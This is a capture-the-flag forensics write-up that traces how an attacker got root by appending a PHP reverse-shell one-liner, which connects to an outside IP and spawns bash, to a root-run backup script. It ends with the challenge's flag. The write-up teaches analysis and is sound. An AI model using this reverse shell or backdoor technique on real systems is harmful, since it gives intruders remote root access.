Escalation

Challenge:

Somehow, the attacker was able to gain root access to the web server. We believe the attacker leveraged an existing file to gain root access. What file was modified to allow the attacker to gain root on the web server?

Submit the name of the file and the name of the variable used to store the added command. Example: flag{backdoor.exe_var1} if backdoor.exe is the name of the file and var1 is the name of the variable.

Use the packet capture from Scans.

Solution:

When solving the earlier challenge Scans we identified a number of network streams containing remote shell traffic. So using that info as a starting point for this challenge we reviewed those streams in Wireshark. At the very end of stream 4999 we can see the attacker modifying /opt/backup.py to perform a network connection to 165.227.73.138:4815 and expose a bash shell in the connection.

/>echo "cmd=\"php -r '\$sock=fsockopen(\\\"165.227.73.138\\\",4815);exec(\\\"/bin/bash -i <&3 >&3 2>&3\\\");'\"" >> /opt/backup.py
/>echo "popen(cmd)" >> /opt/backup.py
/>cat /opt/backup.py
#!/usr/bin/env python3
from os import popen
popen('mysqldump -u backup -pbackup123 esu | gzip > /backups/backup_esu_$(date "+%Y%m%d%H%M%S").sql.gz')

cmd="php -r '$sock=fsockopen(\"165.227.73.138\",4815);exec(\"/bin/bash -i <&3 >&3 2>&3\");'"
popen(cmd)
/>exit

The accepted flag was: flag{backup.py_cmd}

Published:

Updated:

Leave a comment